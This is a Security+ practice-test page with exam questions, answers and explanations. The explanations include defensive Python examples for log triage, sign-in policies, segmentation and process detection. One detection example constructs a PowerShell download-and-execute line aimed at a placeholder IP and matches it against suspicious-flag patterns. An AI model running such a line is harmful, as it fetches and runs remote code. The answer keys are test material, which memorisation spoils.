ExamGecko
CompTIA SY0-601 Practice Test - Questions Answers, Page 56


An organization suffered numerous multiday power outages at its current location. The Chief Executive Officer wants to create a disaster recovery strategy to resolve this issue. Which of the following options offer low-cost solutions? (Select two).

A. Warm site
B. Generator
C. Hot site
D. Cold site
E. Cloud backups
F. UPS
Suggested answer: B, F

Explanation:

A generator and a UPS (uninterruptible power supply) are the low-cost options here because they keep the current location running without paying for a second facility. A UPS supplies battery power for minutes when mains power fails, long enough for an orderly shutdown or to cover the seconds-to-minutes gap while a generator starts; a generator burns fuel to produce electricity and can carry the site through a multiday outage as long as it is refueled. The two are complementary: a UPS alone does not last days, and a generator alone leaves a gap at switch-over. Hot, warm and cold sites all require an alternate facility and are far more expensive, and cloud backups protect data but do not keep operations running.

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would most likely show where the malware originated?

A. The DNS logs
B. The web server logs
C. The SIP traffic logs
D. The SNMP logs
Suggested answer: A

Explanation:

The DNS logs record every name the host resolved, with the timestamp and client IP of each query, so they show which external sites the user's browser contacted during the day, including the one that delivered the malware, regardless of which web server served it. Web server logs (option B) are the organization's own servers' records of inbound requests and say nothing about where an internal user browsed; SIP logs cover VoIP signalling and SNMP logs cover device management. In practice the responder filters the resolver log for the infected host's IP in the minutes before the first alert and looks for domains the host (or the fleet) has never resolved before, random-looking labels, and NXDOMAIN responses that suggest a domain-generation algorithm.
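The triage described above, written out as an added example (this is not ExamGecko's or CompTIA's code, and the resolver log lines, the host IP 10.20.4.17, the alert time and the "known domains" baseline are all constructed for illustration). It assumes a simplified one-line-per-query resolver log format; a real BIND query log, Windows DNS analytic log or Zeek dns.log needs its own parser.

```python
"""Triage a host's DNS activity in the window before the first malware alert.

Added example; not code from the page. Log lines and baseline are constructed.
Line format assumed: "<ISO8601 UTC timestamp> <client_ip> <qname> <qtype> <rcode>".
"""
from collections import Counter
from datetime import datetime, timedelta

# Constructed sample resolver log (the infected host is 10.20.4.17).
DNS_LOG = """\
2024-05-02T09:02:11Z 10.20.4.17 login.microsoftonline.com A NOERROR
2024-05-02T09:05:40Z 10.20.4.17 www.bbc.co.uk A NOERROR
2024-05-02T13:41:02Z 10.20.4.17 cdn.example-news.net A NOERROR
2024-05-02T13:41:03Z 10.20.4.17 x7f3q.update-check-now.xyz A NOERROR
2024-05-02T13:41:05Z 10.20.4.17 x7f3q.update-check-now.xyz A NOERROR
2024-05-02T13:41:09Z 10.20.4.17 a8b2c9d1e0f4.dynamic-host.top A NXDOMAIN
2024-05-02T13:42:30Z 10.20.4.22 login.microsoftonline.com A NOERROR
2024-05-02T15:10:00Z 10.20.4.17 www.bbc.co.uk A NOERROR
"""

# Constructed baseline: names the fleet has resolved before this incident.
KNOWN_DOMAINS = {"login.microsoftonline.com", "www.bbc.co.uk", "cdn.example-news.net"}

TS_FORMAT = "%Y-%m-%dT%H:%M:%SZ"


def parse_dns_log(text):
    """Parse the assumed line format into dicts with a datetime timestamp."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, client, qname, qtype, rcode = line.split()
        events.append({
            "ts": datetime.strptime(ts, TS_FORMAT),
            "client": client,
            "qname": qname.lower().rstrip("."),
            "qtype": qtype,
            "rcode": rcode,
        })
    return events


def registered_domain(qname):
    """Naive eTLD+1 (last two labels); production code should use the public suffix list."""
    return ".".join(qname.split(".")[-2:])


def looks_random(label):
    """Crude DGA heuristic: a long label with several digits mixed into the letters."""
    return len(label) >= 8 and sum(c.isdigit() for c in label) >= 3


def triage_dns(events, client_ip, first_alert_iso, window_minutes=30):
    """Return suspicious lookups by client_ip in the window ending at first_alert.

    Each hit is (iso_timestamp, qname, [reasons]); the first hit is the
    earliest candidate for where the malware came from.
    """
    first_alert = datetime.strptime(first_alert_iso, TS_FORMAT)
    start = first_alert - timedelta(minutes=window_minutes)
    known_bases = {registered_domain(d) for d in KNOWN_DOMAINS}
    hits = []
    for e in events:
        if e["client"] != client_ip or not (start <= e["ts"] <= first_alert):
            continue
        reasons = []
        if e["qname"] not in KNOWN_DOMAINS and registered_domain(e["qname"]) not in known_bases:
            reasons.append("never resolved before")
        if e["rcode"] == "NXDOMAIN":
            reasons.append("NXDOMAIN (possible DGA)")
        if looks_random(e["qname"].split(".")[0]):
            reasons.append("random-looking label")
        if reasons:
            hits.append((e["ts"].isoformat(), e["qname"], reasons))
    return hits


def lookup_counts(events, client_ip):
    """How often the host resolved each name; repeated beaconing stands out."""
    return Counter(e["qname"] for e in events if e["client"] == client_ip)


if __name__ == "__main__":
    evs = parse_dns_log(DNS_LOG)
    # Constructed: the EDR raised its first alert at 13:45 UTC.
    for ts, name, why in triage_dns(evs, "10.20.4.17", "2024-05-02T13:45:00Z"):
        print(ts, name, ", ".join(why))
```

The window and the three heuristics are deliberately simple; the point is that the resolver log alone, filtered by client and time, narrows "browsing all day" down to a handful of candidate domains to pivot on.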

Which of the following exercises should an organization use to improve its incident response process?

A. Tabletop
B. Replication
C. Failover
D. Recovery
Suggested answer: A

Explanation:

A tabletop exercise is a discussion-based exercise in which the response team walks through a hypothetical incident scenario and tests the incident response plan against it without touching production systems. It improves the process by exposing gaps in the plan, unclear roles and responsibilities, and missing communication channels, and by letting the team judge how effective and efficient the documented steps would be. Replication, failover and recovery are availability and continuity mechanisms, not exercises for the response process.

A company's legal department drafted sensitive documents in a SaaS application and wants to ensure the documents cannot be accessed by individuals in high-risk countries. Which of the following is the most effective way to limit this access?

A. Data masking
B. Encryption
C. Geolocation policy
D. Data sovereignty regulation
Suggested answer: C

Explanation:

A geolocation policy restricts access to data or resources based on the physical location of the user or device, usually by resolving the source IP address of each request against a GeoIP database and denying requests from countries on the block list; most SaaS platforms and identity providers expose this as a conditional access or login policy. It is the most direct answer because it enforces the legal department's requirement at every access attempt. Encryption and data masking protect the content but do not decide who may reach it, and data sovereignty regulation is an external legal constraint rather than a control the company configures. The caveat a practitioner would add: IP geolocation can be evaded with a VPN or proxy, so pair it with MFA and treat it as one layer rather than the whole control.

A worldwide manufacturing company has been experiencing email account compromises. In one incident, a user logged in from the corporate office in France, but then seconds later, the same user account attempted a login from Brazil. Which of the following account policies would best prevent this type of attack?

A. Network location
B. Impossible travel time
C. Geolocation
D. Geofencing
Suggested answer: B

Explanation:

Impossible travel is a detection rule that compares the location of a login with the user's previous login and flags the pair when the distance could not have been covered in the elapsed time. A login from France followed seconds later by one from Brazil fails that test, which strongly suggests that the second attempt uses stolen or guessed credentials. As an account policy it prevents the compromise by blocking the flagged session or forcing step-up authentication before it proceeds. Plain geolocation or geofencing would not help here because both France and Brazil may be legitimate locations for a worldwide company; only the combination of time and distance exposes the attack.
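The two policies from this question and the previous one (a country block list and an impossible-travel check), implemented together as an added example. This is not ExamGecko's, CompTIA's or any identity provider's code: the IP-to-location table stands in for a GeoIP database, the blocked country "XX" and the 1000 km/h threshold are placeholders for whatever policy specifies, and the sign-in events are constructed.

```python
"""Geolocation policy and impossible-travel check over sign-in events.

Added example; not code from the page. GEOIP, BLOCKED_COUNTRIES, the speed
threshold and EVENTS are constructed assumptions.
"""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed stand-in for a GeoIP lookup: ip -> (ISO country code, lat, lon).
GEOIP = {
    "203.0.113.10": ("FR", 48.8566, 2.3522),     # Paris office
    "198.51.100.7": ("BR", -23.5505, -46.6333),  # Sao Paulo
    "192.0.2.55": ("US", 40.7128, -74.0060),     # New York
    "198.18.0.9": ("XX", 0.0, 0.0),              # placeholder "high-risk" country
}
BLOCKED_COUNTRIES = {"XX"}   # whatever the legal department lists as high-risk
MAX_SPEED_KMH = 1000.0       # nothing a commercial flight plus airport time exceeds


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points in kilometres."""
    r = 6371.0
    p1, p2 = radians(lat1), radians(lat2)
    dphi = radians(lat2 - lat1)
    dlmb = radians(lon2 - lon1)
    a = sin(dphi / 2) ** 2 + cos(p1) * cos(p2) * sin(dlmb / 2) ** 2
    return 2 * r * asin(sqrt(a))


def evaluate_signins(events):
    """Apply both policies to (iso_ts, user, src_ip) events in time order.

    Returns a list of (iso_ts, user, src_ip, verdict) with verdict one of
    ALLOW, DENY:geolocation or DENY:impossible_travel. Only allowed logins
    update the user's last known position, so a denied attempt cannot be
    used to "move" the user before the next check.
    """
    last_good = {}
    out = []
    for ts_s, user, ip in sorted(events):
        ts = datetime.fromisoformat(ts_s)
        country, lat, lon = GEOIP.get(ip, ("??", None, None))
        if country in BLOCKED_COUNTRIES or lat is None:
            verdict = "DENY:geolocation"   # unknown location is treated as unsafe
        else:
            verdict = "ALLOW"
            if user in last_good:
                pts, plat, plon = last_good[user]
                # Floor at one second so a same-second pair cannot divide by zero.
                hours = max((ts - pts).total_seconds() / 3600.0, 1 / 3600.0)
                if haversine_km(plat, plon, lat, lon) / hours > MAX_SPEED_KMH:
                    verdict = "DENY:impossible_travel"
        if verdict == "ALLOW":
            last_good[user] = (ts, lat, lon)
        out.append((ts_s, user, ip, verdict))
    return out


# Constructed sign-in events.
EVENTS = [
    ("2024-05-02T09:00:00", "alice", "203.0.113.10"),  # Paris
    ("2024-05-02T09:00:20", "alice", "198.51.100.7"),  # Brazil, 20 s later
    ("2024-05-02T09:30:00", "bob", "192.0.2.55"),      # New York
    ("2024-05-02T10:00:00", "bob", "198.18.0.9"),      # blocked country
    ("2024-05-02T20:00:00", "bob", "203.0.113.10"),    # Paris, 10.5 h after NY
]

if __name__ == "__main__":
    for row in evaluate_signins(EVENTS):
        print(*row)
```

Note the order of the checks: the country block is evaluated first because it needs no history, and the travel check compares only against the last allowed login, which is what keeps an attacker from "resetting" a user's position with a denied attempt.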

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive's accounts. Which of the following security practices would have addressed the issue?

A. A non-disclosure agreement
B. Least privilege
C. An acceptable use policy
D. Off boarding
Suggested answer: D

Explanation:

Off boarding is the security practice of revoking an employee's access when they leave the organization or change roles: disabling or deleting their accounts, rotating any shared credentials they knew, revoking tokens and keys, and collecting devices and badges, triggered by HR on the day of departure rather than days later. Had the executive been offboarded properly, the later successful logons to those accounts would have been impossible. An NDA and an acceptable use policy are agreements that do not technically stop access, and least privilege limits what an active account can do but would not have disabled it.

An organization's Chief Security Officer (CSO) wants to validate the business's involvement in the incident response plan to ensure its validity and thoroughness. Which of the following will the CSO most likely use?

A. An external security assessment
B. A bug bounty program
C. A tabletop exercise
D. A red-team engagement
Suggested answer: C

Explanation:

A tabletop exercise walks the key stakeholders, including senior management, the affected business units, legal, communications and IT, through a hypothetical incident and the plan's response to it. Because the business representatives must speak to their own decisions and hand-offs during the discussion, the CSO can see directly whether the plan reflects how the business actually operates and whether it is complete. External assessments, bug bounties and red-team engagements test the technical environment, not the business's part in the plan.

A large industrial system's smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company's security manager notices the generator's IP is sending packets to an internal file server's IP. Which of the following mitigations would be best for the security manager to implement while maintaining alerting capabilities?

A. Segmentation
B. Firewall allow list
C. Containment
D. Isolation
Suggested answer: A

Explanation:

Segmentation divides the network into smaller subnetworks or zones based on function, role, location or trust level, with firewall policy controlling what crosses between them. Placing the smart generator in its own operational-technology segment, with a default-deny policy that permits only the outbound alerting path to the maintenance vendor (for example through a relay in a DMZ) and blocks everything toward the internal file server, stops the suspicious traffic while keeping alerts flowing. Isolation or containment would cut the generator off completely and lose the alerting capability; a firewall allow list is the mechanism used to enforce the segment boundary, which is why the broader design answer is segmentation. Either way, the generator-to-file-server flow should also be investigated as a possible compromise of the device.
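What the segment boundary looks like as a default-deny allow list, and how to check observed flows against it, as an added example (not ExamGecko's, CompTIA's or any vendor's code). The segments, the generator and file server addresses, the DMZ alert relay, the alerting ports and the NetFlow-like records are all constructed.

```python
"""Check observed flows against a default-deny segmentation policy for an OT segment.

Added example; not code from the page. Segments, hosts, ports and FLOWS are
constructed assumptions.
"""
import ipaddress
from dataclasses import dataclass

OT_SEGMENT = ipaddress.ip_network("10.50.0.0/24")    # smart generator and other OT gear
IT_SEGMENT = ipaddress.ip_network("10.10.0.0/16")    # file servers, workstations
ALERT_RELAY = ipaddress.ip_network("10.60.0.5/32")   # DMZ host that forwards alerts to the vendor


@dataclass(frozen=True)
class Rule:
    src: ipaddress.IPv4Network
    dst: ipaddress.IPv4Network
    proto: str
    dport: int


# The whole allow list for the OT boundary: alerts out to the relay, nothing else.
ALLOW = [
    Rule(OT_SEGMENT, ALERT_RELAY, "tcp", 443),  # HTTPS alert API
    Rule(OT_SEGMENT, ALERT_RELAY, "tcp", 25),   # SMTP alert mail
]


def crosses_ot_boundary(src, dst):
    """Only flows with exactly one end in the OT segment are governed by ALLOW."""
    src, dst = ipaddress.ip_address(str(src)), ipaddress.ip_address(str(dst))
    return (src in OT_SEGMENT) != (dst in OT_SEGMENT)


def is_allowed(src, dst, proto, dport):
    """Default deny for flows crossing the OT boundary; other flows are out of scope."""
    src, dst = ipaddress.ip_address(str(src)), ipaddress.ip_address(str(dst))
    if not crosses_ot_boundary(src, dst):
        return True
    return any(src in r.src and dst in r.dst and proto == r.proto and dport == r.dport
               for r in ALLOW)


def evaluate_flows(flow_text):
    """Parse 'src dst proto dport bytes' records; return [(record, verdict)]."""
    results = []
    for line in flow_text.splitlines():
        if not line.strip():
            continue
        src, dst, proto, dport, _nbytes = line.split()
        if not crosses_ot_boundary(src, dst):
            verdict = "not governed"
        elif is_allowed(src, dst, proto.lower(), int(dport)):
            verdict = "allowed"
        else:
            verdict = "VIOLATION"
        results.append((line, verdict))
    return results


def violations(flow_text):
    """Just the records that the segment policy would have dropped."""
    return [rec for rec, v in evaluate_flows(flow_text) if v == "VIOLATION"]


# Constructed flow records (the generator is 10.50.0.20, the file server 10.10.3.8).
FLOWS = """\
10.50.0.20 10.60.0.5 tcp 443 2048
10.50.0.20 10.10.3.8 tcp 445 91234
10.10.3.8 10.50.0.20 tcp 22 4096
10.10.3.8 10.10.5.1 tcp 443 1500
10.50.0.20 10.60.0.5 udp 53 120
"""

if __name__ == "__main__":
    for rec, v in evaluate_flows(FLOWS):
        print(f"{v:13} {rec}")
```

Running it over the constructed records flags the generator's SMB flow to the file server, the inbound SSH attempt from the IT segment, and the generator's DNS query, which is a reminder that a strict allow list must also carry whatever name resolution the alerting path needs; the HTTPS alert to the relay is the only OT flow that survives.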

Which of the following is the correct order of volatility from most to least volatile?

A. Memory, temporary filesystems, routing tables, disk, network storage
B. Cache, memory, temporary filesystems, disk, archival media
C. Memory, disk, temporary filesystems, cache, archival media
D. Cache, disk, temporary filesystems, network storage, archival media
Suggested answer: B

Explanation:

The order of volatility describes how quickly evidence can be lost or changed on a system; it sets the priority and sequence of collection during digital forensics, because the most volatile data must be captured first. The order given in RFC 3227, from most to least volatile, is CPU registers and cache, then memory (including routing tables, ARP cache, process table and kernel statistics), then temporary filesystems, then disk, then remote logging and monitoring data, then physical configuration and network topology, and finally archival media. Option B matches this sequence: cache is the fastest and most volatile storage, holding recently used data; memory (RAM) holds the state of running processes; temporary filesystems such as swap and print spool files are created and deleted during normal operation; disk is persistent magnetic or solid-state storage; and archival media such as tape and optical disks hold data for long-term preservation. Options A, C and D each put a less volatile item ahead of a more volatile one.

A security analyst is investigating an incident to determine what an attacker was able to do on a compromised laptop. The analyst reviews the following SIEM log:

Which of the following describes the method that was used to compromise the laptop?

A. An attacker was able to move laterally from PC1 to PC2 using a pass-the-hash attack
B. An attacker was able to bypass the application approve list by emailing a spreadsheet attachment with an embedded PowerShell in the file.
C. An attacker was able to install malware to the CAasdf234 folder and use it to gain administrator rights and launch Outlook
D. An attacker was able to phish user credentials successfully from an Outlook user profile
Suggested answer: B

Explanation:

The SIEM log shows the user opening an email attachment named "Invoice.xlsx" and then a PowerShell script, launched from the spreadsheet, downloading and running a file from a remote server. That chain is how the attacker bypassed the application approve list: the spreadsheet application and PowerShell are both approved binaries, so the malicious code runs inside allowed processes without dropping an unapproved executable, a common technique for evading allow-listing and delivering a payload. Nothing in the chain shows lateral movement with a hash (A), a separate malware folder gaining administrator rights (C) or credential theft from the Outlook profile (D). For detection, the high-signal indicator is the parent-child relationship (an Office process as the parent of powershell.exe) combined with hidden-window, non-interactive, encoded or download command-line flags.
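The parent-child detection just described, as an added example (not ExamGecko's, CompTIA's or any EDR vendor's code; the page's own SIEM log is not reproduced here). The process events are constructed in a simplified Sysmon/EDR-like shape, and the field names, host name, payload URL and script paths are assumptions for illustration. The encoded command is built in code so that its base64 is guaranteed to decode.

```python
"""Flag Office processes spawning script hosts with download or encoded flags.

Added example; not code from the page. EVENTS, PAYLOAD and the field names
are constructed assumptions.
"""
import base64
import re

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
SUSPICIOUS = re.compile(
    r"-(?:enc|encodedcommand|e)\b|-nop\b|-w(?:indowstyle)?\s+hidden|\biex\b"
    r"|downloadstring|downloadfile|invoke-webrequest|start-bitstransfer",
    re.IGNORECASE,
)
ENCODED_ARG = re.compile(r"-(?:enc|encodedcommand|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """Return the list of reasons an event is suspicious (empty when benign)."""
    reasons = []
    parent, image = basename(ev["parent_image"]), basename(ev["image"])
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {image}")
    text = ev["cmdline"]
    decoded = decode_encoded_command(text)
    if decoded is not None:
        reasons.append("encoded command: " + decoded[:60])
        text = text + " " + decoded          # scan the decoded script too
    for flag in sorted({m.lower() for m in SUSPICIOUS.findall(text)}):
        reasons.append("flag: " + flag)
    return reasons


def triage_process_events(events):
    """Return (host, user, reasons) for every event with at least one reason."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if reasons:
            hits.append((ev["host"], ev["user"], reasons))
    return hits


# Constructed payload and events.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/payload.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
EVENTS = [
    {"host": "LAPTOP-17", "user": "joe",
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "cmdline": r'"EXCEL.EXE" "C:\Users\joe\Downloads\Invoice.xlsx"'},
    {"host": "LAPTOP-17", "user": "joe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"host": "LAPTOP-17", "user": "SYSTEM",
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for host, user, reasons in triage_process_events(EVENTS):
        print(host, user)
        for r in reasons:
            print("   ", r)
```

Only the second event fires: Excel opening the spreadsheet is normal, and the scheduled inventory script run by svchost has no Office parent and none of the flagged switches, so the parent-child relationship carries the signal even before the command line is decoded.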
